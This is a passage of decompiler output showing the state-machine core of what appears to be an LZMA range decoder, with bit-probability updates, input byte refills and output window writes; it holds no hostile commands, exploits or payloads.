                    											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                    											if( *(_t613 - 0x48) != 0) {
                    												goto L21;
                    											}
                    											goto L24;
                    										case 4:
                    											L133:
                    											_t531 =  *_t606;
                    											_t589 = _t531 & 0x0000ffff;
                    											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                    											if( *(_t613 - 0xc) >= _t565) {
                    												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                    												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                    												 *(_t613 - 0x40) = 1;
                    												_t532 = _t531 - (_t531 >> 5);
                    												 *_t606 = _t532;
                    											} else {
                    												 *(_t613 - 0x10) = _t565;
                    												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                    											}
                    											if( *(_t613 - 0x10) >= 0x1000000) {
                    												goto L139;
                    											}
                    										case 5:
                    											goto L137;
                    										case 6:
                    											__edx = 0;
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x34) = 1;
                    												 *(__ebp - 0x84) = 7;
                    												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                    												while(1) {
                    													 *(_t613 - 0x54) = _t606;
                    													goto L133;
                    												}
                    											}
                    											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                    											__esi =  *(__ebp - 0x60);
                    											__cl = 8;
                    											__cl = 8 -  *(__ebp - 0x3c);
                    											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                    											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                    											__ecx =  *(__ebp - 0x3c);
                    											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                    											__ecx =  *(__ebp - 4);
                    											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                    											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                    											__eflags =  *(__ebp - 0x38) - 4;
                    											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    											if( *(__ebp - 0x38) >= 4) {
                    												__eflags =  *(__ebp - 0x38) - 0xa;
                    												if( *(__ebp - 0x38) >= 0xa) {
                    													_t98 = __ebp - 0x38;
                    													 *_t98 =  *(__ebp - 0x38) - 6;
                    													__eflags =  *_t98;
                    												} else {
                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                    												}
                    											} else {
                    												 *(__ebp - 0x38) = 0;
                    											}
                    											__eflags =  *(__ebp - 0x34) - __edx;
                    											if( *(__ebp - 0x34) == __edx) {
                    												__ebx = 0;
                    												__ebx = 1;
                    												goto L61;
                    											} else {
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__ecx =  *(__ebp - 8);
                    												__ebx = 0;
                    												__ebx = 1;
                    												__al =  *((intOrPtr*)(__eax + __ecx));
                    												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                    												goto L41;
                    											}
                    										case 7:
                    											__eflags =  *(__ebp - 0x40) - 1;
                    											if( *(__ebp - 0x40) != 1) {
                    												__eax =  *(__ebp - 0x24);
                    												 *(__ebp - 0x80) = 0x16;
                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    												__eax =  *(__ebp - 0x28);
                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    												__eax =  *(__ebp - 0x2c);
                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    												__eax = 0;
                    												__eflags =  *(__ebp - 0x38) - 7;
                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    												__al = __al & 0x000000fd;
                    												__eax = (__eflags >= 0) - 1 + 0xa;
                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                    												__eax =  *(__ebp - 4);
                    												__eax =  *(__ebp - 4) + 0x664;
                    												__eflags = __eax;
                    												 *(__ebp - 0x58) = __eax;
                    												goto L69;
                    											}
                    											__eax =  *(__ebp - 4);
                    											__ecx =  *(__ebp - 0x38);
                    											 *(__ebp - 0x84) = 8;
                    											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                    											while(1) {
                    												 *(_t613 - 0x54) = _t606;
                    												goto L133;
                    											}
                    										case 8:
                    											goto L0;
                    										case 9:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												goto L89;
                    											}
                    											__eflags =  *(__ebp - 0x60);
                    											if( *(__ebp - 0x60) == 0) {
                    												goto L171;
                    											}
                    											__eax = 0;
                    											__eflags =  *(__ebp - 0x38) - 7;
                    											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                    											__eflags = _t258;
                    											0 | _t258 = _t258 + _t258 + 9;
                    											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                    											goto L75;
                    										case 0xa:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x84) = 0xb;
                    												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                    												while(1) {
                    													 *(_t613 - 0x54) = _t606;
                    													goto L133;
                    												}
                    											}
                    											__eax =  *(__ebp - 0x28);
                    											goto L88;
                    										case 0xb:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__ecx =  *(__ebp - 0x24);
                    												__eax =  *(__ebp - 0x20);
                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    											} else {
                    												__eax =  *(__ebp - 0x24);
                    											}
                    											__ecx =  *(__ebp - 0x28);
                    											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    											L88:
                    											__ecx =  *(__ebp - 0x2c);
                    											 *(__ebp - 0x2c) = __eax;
                    											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    											L89:
                    											__eax =  *(__ebp - 4);
                    											 *(__ebp - 0x80) = 0x15;
                    											__eax =  *(__ebp - 4) + 0xa68;
                    											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                    											goto L69;
                    										case 0xc:
                    											L99:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xc;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t334 = __ebp - 0x70;
                    											 *_t334 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t334;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											__eax =  *(__ebp - 0x2c);
                    											goto L101;
                    										case 0xd:
                    											L37:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xd;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t122 = __ebp - 0x70;
                    											 *_t122 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t122;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L39:
                    											__eax =  *(__ebp - 0x40);
                    											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                    												goto L48;
                    											}
                    											__eflags = __ebx - 0x100;
                    											if(__ebx >= 0x100) {
                    												goto L54;
                    											}
                    											L41:
                    											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                    											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                    											__ecx =  *(__ebp - 0x58);
                    											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                    											 *(__ebp - 0x48) = __eax;
                    											__eax = __eax + 1;
                    											__eax = __eax << 8;
                    											__eax = __eax + __ebx;
                    											__esi =  *(__ebp - 0x58) + __eax * 2;
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    											__ax =  *__esi;
                    											 *(__ebp - 0x54) = __esi;
                    											__edx = __ax & 0x0000ffff;
                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                    											__eflags =  *(__ebp - 0xc) - __ecx;
                    											if( *(__ebp - 0xc) >= __ecx) {
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    												__cx = __ax;
                    												 *(__ebp - 0x40) = 1;
                    												__cx = __ax >> 5;
                    												__eflags = __eax;
                    												__ebx = __ebx + __ebx + 1;
                    												 *__esi = __ax;
                    											} else {
                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                    												 *(__ebp - 0x10) = __ecx;
                    												0x800 = 0x800 - __edx;
                    												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    												__ebx = __ebx + __ebx;
                    												 *__esi = __cx;
                    											}
                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                    											 *(__ebp - 0x44) = __ebx;
                    											if( *(__ebp - 0x10) >= 0x1000000) {
                    												goto L39;
                    											} else {
                    												goto L37;
                    											}
                    										case 0xe:
                    											L46:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xe;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t156 = __ebp - 0x70;
                    											 *_t156 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t156;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											while(1) {
                    												L48:
                    												__eflags = __ebx - 0x100;
                    												if(__ebx >= 0x100) {
                    													break;
                    												}
                    												__eax =  *(__ebp - 0x58);
                    												__edx = __ebx + __ebx;
                    												__ecx =  *(__ebp - 0x10);
                    												__esi = __edx + __eax;
                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                    												__ax =  *__esi;
                    												 *(__ebp - 0x54) = __esi;
                    												__edi = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													_t170 = __edx + 1; // 0x1
                    													__ebx = _t170;
                    													__cx = __ax >> 5;
                    													__eflags = __eax;
                    													 *__esi = __ax;
                    												} else {
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edi;
                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    													__ebx = __ebx + __ebx;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													continue;
                    												} else {
                    													goto L46;
                    												}
                    											}
                    											L54:
                    											_t173 = __ebp - 0x34;
                    											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                    											__eflags =  *_t173;
                    											goto L55;
                    										case 0xf:
                    											L58:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xf;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t203 = __ebp - 0x70;
                    											 *_t203 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t203;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L60:
                    											__eflags = __ebx - 0x100;
                    											if(__ebx >= 0x100) {
                    												L55:
                    												__al =  *(__ebp - 0x44);
                    												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                    												goto L56;
                    											}
                    											L61:
                    											__eax =  *(__ebp - 0x58);
                    											__edx = __ebx + __ebx;
                    											__ecx =  *(__ebp - 0x10);
                    											__esi = __edx + __eax;
                    											__ecx =  *(__ebp - 0x10) >> 0xb;
                    											__ax =  *__esi;
                    											 *(__ebp - 0x54) = __esi;
                    											__edi = __ax & 0x0000ffff;
                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    											__eflags =  *(__ebp - 0xc) - __ecx;
                    											if( *(__ebp - 0xc) >= __ecx) {
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    												__cx = __ax;
                    												_t217 = __edx + 1; // 0x1
                    												__ebx = _t217;
                    												__cx = __ax >> 5;
                    												__eflags = __eax;
                    												 *__esi = __ax;
                    											} else {
                    												 *(__ebp - 0x10) = __ecx;
                    												0x800 = 0x800 - __edi;
                    												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    												__ebx = __ebx + __ebx;
                    												 *__esi = __cx;
                    											}
                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                    											 *(__ebp - 0x44) = __ebx;
                    											if( *(__ebp - 0x10) >= 0x1000000) {
                    												goto L60;
                    											} else {
                    												goto L58;
                    											}
                    										case 0x10:
                    											L109:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0x10;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t365 = __ebp - 0x70;
                    											 *_t365 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t365;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											goto L111;
                    										case 0x11:
                    											L69:
                    											__esi =  *(__ebp - 0x58);
                    											 *(__ebp - 0x84) = 0x12;
                    											while(1) {
                    												 *(_t613 - 0x54) = _t606;
                    												goto L133;
                    											}
                    										case 0x12:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__eax =  *(__ebp - 0x58);
                    												 *(__ebp - 0x84) = 0x13;
                    												__esi =  *(__ebp - 0x58) + 2;
                    												while(1) {
                    													 *(_t613 - 0x54) = _t606;
                    													goto L133;
                    												}
                    											}
                    											__eax =  *(__ebp - 0x4c);
                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                    											__ecx =  *(__ebp - 0x58);
                    											__eax =  *(__ebp - 0x4c) << 4;
                    											__eflags = __eax;
                    											__eax =  *(__ebp - 0x58) + __eax + 4;
                    											goto L130;
                    										case 0x13:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												_t469 = __ebp - 0x58;
                    												 *_t469 =  *(__ebp - 0x58) + 0x204;
                    												__eflags =  *_t469;
                    												 *(__ebp - 0x30) = 0x10;
                    												 *(__ebp - 0x40) = 8;
                    												L144:
                    												 *(__ebp - 0x7c) = 0x14;
                    												goto L145;
                    											}
                    											__eax =  *(__ebp - 0x4c);
                    											__ecx =  *(__ebp - 0x58);
                    											__eax =  *(__ebp - 0x4c) << 4;
                    											 *(__ebp - 0x30) = 8;
                    											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                    											L130:
                    											 *(__ebp - 0x58) = __eax;
                    											 *(__ebp - 0x40) = 3;
                    											goto L144;
                    										case 0x14:
                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                    											__eax =  *(__ebp - 0x80);
                    											 *(_t613 - 0x88) = _t533;
                    											goto L1;
                    										case 0x15:
                    											__eax = 0;
                    											__eflags =  *(__ebp - 0x38) - 7;
                    											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    											__al = __al & 0x000000fd;
                    											__eax = (__eflags >= 0) - 1 + 0xb;
                    											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                    											goto L120;
                    										case 0x16:
                    											__eax =  *(__ebp - 0x30);
                    											__eflags = __eax - 4;
                    											if(__eax >= 4) {
                    												_push(3);
                    												_pop(__eax);
                    											}
                    											__ecx =  *(__ebp - 4);
                    											 *(__ebp - 0x40) = 6;
                    											__eax = __eax << 7;
                    											 *(__ebp - 0x7c) = 0x19;
                    											 *(__ebp - 0x58) = __eax;
                    											goto L145;
                    										case 0x17:
                    											L145:
                    											__eax =  *(__ebp - 0x40);
                    											 *(__ebp - 0x50) = 1;
                    											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                    											goto L149;
                    										case 0x18:
                    											L146:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0x18;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t484 = __ebp - 0x70;
                    											 *_t484 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t484;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L148:
                    											_t487 = __ebp - 0x48;
                    											 *_t487 =  *(__ebp - 0x48) - 1;
                    											__eflags =  *_t487;
                    											L149:
                    											__eflags =  *(__ebp - 0x48);
                    											if( *(__ebp - 0x48) <= 0) {
                    												__ecx =  *(__ebp - 0x40);
                    												__ebx =  *(__ebp - 0x50);
                    												0 = 1;
                    												__eax = 1 << __cl;
                    												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                    												__eax =  *(__ebp - 0x7c);
                    												 *(__ebp - 0x44) = __ebx;
                    												while(1) {
                    													 *(_t613 - 0x88) = _t533;
                    													goto L1;
                    												}
                    											}
                    											__eax =  *(__ebp - 0x50);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    											__eax =  *(__ebp - 0x58);
                    											__esi = __edx + __eax;
                    											 *(__ebp - 0x54) = __esi;
                    											__ax =  *__esi;
                    											__edi = __ax & 0x0000ffff;
                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    											__eflags =  *(__ebp - 0xc) - __ecx;
                    											if( *(__ebp - 0xc) >= __ecx) {
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    												__cx = __ax;
                    												__cx = __ax >> 5;
                    												__eax = __eax - __ecx;
                    												__edx = __edx + 1;
                    												__eflags = __edx;
                    												 *__esi = __ax;
                    												 *(__ebp - 0x50) = __edx;
                    											} else {
                    												 *(__ebp - 0x10) = __ecx;
                    												0x800 = 0x800 - __edi;
                    												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    												 *__esi = __cx;
                    											}
                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                    											if( *(__ebp - 0x10) >= 0x1000000) {
                    												goto L148;
                    											} else {
                    												goto L146;
                    											}
                    										case 0x19:
                    											__eflags = __ebx - 4;
                    											if(__ebx < 4) {
                    												 *(__ebp - 0x2c) = __ebx;
                    												L119:
                    												_t393 = __ebp - 0x2c;
                    												 *_t393 =  *(__ebp - 0x2c) + 1;
                    												__eflags =  *_t393;
                    												L120:
                    												__eax =  *(__ebp - 0x2c);
                    												__eflags = __eax;
                    												if(__eax == 0) {
                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                    													goto L170;
                    												}
                    												__eflags = __eax -  *(__ebp - 0x60);
                    												if(__eax >  *(__ebp - 0x60)) {
                    													goto L171;
                    												}
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                    												__eax =  *(__ebp - 0x30);
                    												_t400 = __ebp - 0x60;
                    												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                    												__eflags =  *_t400;
                    												goto L123;
                    											}
                    											__ecx = __ebx;
                    											__eax = __ebx;
                    											__ecx = __ebx >> 1;
                    											__eax = __ebx & 0x00000001;
                    											__ecx = (__ebx >> 1) - 1;
                    											__al = __al | 0x00000002;
                    											__eax = (__ebx & 0x00000001) << __cl;
                    											__eflags = __ebx - 0xe;
                    											 *(__ebp - 0x2c) = __eax;
                    											if(__ebx >= 0xe) {
                    												__ebx = 0;
                    												 *(__ebp - 0x48) = __ecx;
                    												L102:
                    												__eflags =  *(__ebp - 0x48);
                    												if( *(__ebp - 0x48) <= 0) {
                    													__eax = __eax + __ebx;
                    													 *(__ebp - 0x40) = 4;
                    													 *(__ebp - 0x2c) = __eax;
                    													__eax =  *(__ebp - 4);
                    													__eax =  *(__ebp - 4) + 0x644;
                    													__eflags = __eax;
                    													L108:
                    													__ebx = 0;
                    													 *(__ebp - 0x58) = __eax;
                    													 *(__ebp - 0x50) = 1;
                    													 *(__ebp - 0x44) = 0;
                    													 *(__ebp - 0x48) = 0;
                    													L112:
                    													__eax =  *(__ebp - 0x40);
                    													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                    														_t391 = __ebp - 0x2c;
                    														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                    														__eflags =  *_t391;
                    														goto L119;
                    													}
                    													__eax =  *(__ebp - 0x50);
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    													__eax =  *(__ebp - 0x58);
                    													__esi = __edi + __eax;
                    													 *(__ebp - 0x54) = __esi;
                    													__ax =  *__esi;
                    													__ecx = __ax & 0x0000ffff;
                    													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                    													__eflags =  *(__ebp - 0xc) - __edx;
                    													if( *(__ebp - 0xc) >= __edx) {
                    														__ecx = 0;
                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                    														__ecx = 1;
                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                    														__ebx = 1;
                    														__ecx =  *(__ebp - 0x48);
                    														__ebx = 1 << __cl;
                    														__ecx = 1 << __cl;
                    														__ebx =  *(__ebp - 0x44);
                    														__ebx =  *(__ebp - 0x44) | __ecx;
                    														__cx = __ax;
                    														__cx = __ax >> 5;
                    														__eax = __eax - __ecx;
                    														__edi = __edi + 1;
                    														__eflags = __edi;
                    														 *(__ebp - 0x44) = __ebx;
                    														 *__esi = __ax;
                    														 *(__ebp - 0x50) = __edi;
                    													} else {
                    														 *(__ebp - 0x10) = __edx;
                    														0x800 = 0x800 - __ecx;
                    														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    														 *__esi = __dx;
                    													}
                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                    													if( *(__ebp - 0x10) >= 0x1000000) {
                    														L111:
                    														_t368 = __ebp - 0x48;
                    														 *_t368 =  *(__ebp - 0x48) + 1;
                    														__eflags =  *_t368;
                    														goto L112;
                    													} else {
                    														goto L109;
                    													}
                    												}
                    												__ecx =  *(__ebp - 0xc);
                    												__ebx = __ebx + __ebx;
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                    												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                    													__ecx =  *(__ebp - 0x10);
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    													__ebx = __ebx | 0x00000001;
                    													__eflags = __ebx;
                    													 *(__ebp - 0x44) = __ebx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													L101:
                    													_t338 = __ebp - 0x48;
                    													 *_t338 =  *(__ebp - 0x48) - 1;
                    													__eflags =  *_t338;
                    													goto L102;
                    												} else {
                    													goto L99;
                    												}
                    											}
                    											__edx =  *(__ebp - 4);
                    											__eax = __eax - __ebx;
                    											 *(__ebp - 0x40) = __ecx;
                    											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                    											goto L108;
                    										case 0x1a:
                    											L56:
                    											__eflags =  *(__ebp - 0x64);
                    											if( *(__ebp - 0x64) == 0) {
                    												 *(__ebp - 0x88) = 0x1a;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x68);
                    											__al =  *(__ebp - 0x5c);
                    											__edx =  *(__ebp - 8);
                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    											 *( *(__ebp - 0x68)) = __al;
                    											__ecx =  *(__ebp - 0x14);
                    											 *(__ecx +  *(__ebp - 8)) = __al;
                    											__eax = __ecx + 1;
                    											__edx = 0;
                    											_t192 = __eax %  *(__ebp - 0x74);
                    											__eax = __eax /  *(__ebp - 0x74);
                    											__edx = _t192;
                    											goto L79;
                    										case 0x1b:
                    											L75:
                    											__eflags =  *(__ebp - 0x64);
                    											if( *(__ebp - 0x64) == 0) {
                    												 *(__ebp - 0x88) = 0x1b;
                    												goto L170;
                    											}
                    											__eax =  *(__ebp - 0x14);
                    											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    											__eflags = __eax -  *(__ebp - 0x74);
                    											if(__eax >=  *(__ebp - 0x74)) {
                    												__eax = __eax +  *(__ebp - 0x74);
                    												__eflags = __eax;
                    											}
                    											__edx =  *(__ebp - 8);
                    											__cl =  *(__eax + __edx);
                    											__eax =  *(__ebp - 0x14);
